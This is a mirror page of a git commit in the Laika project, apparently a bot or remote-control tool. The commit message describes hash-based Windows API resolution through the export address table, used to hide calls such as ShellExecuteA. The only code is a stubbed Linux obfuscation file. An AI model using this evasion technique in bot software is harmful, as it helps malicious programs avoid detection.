mirror of
https://github.com/CPunch/Laika.git
synced 2025-09-29 05:00:04 +00:00
Bot: Added boilerplate windows API obfuscation
- Grabs the functions directly from the loaded library by walking the exported address table and comparing hashes - For now, only ShellExecuteA has been setup, more to come
This commit is contained in:
6
bot/lin/linobf.c
Normal file
6
bot/lin/linobf.c
Normal file
@@ -0,0 +1,6 @@
|
||||
#include "obf.h"
|
||||
|
||||
void laikaO_init()
|
||||
{
|
||||
/* stubbed */
|
||||
}
|
Reference in New Issue
Block a user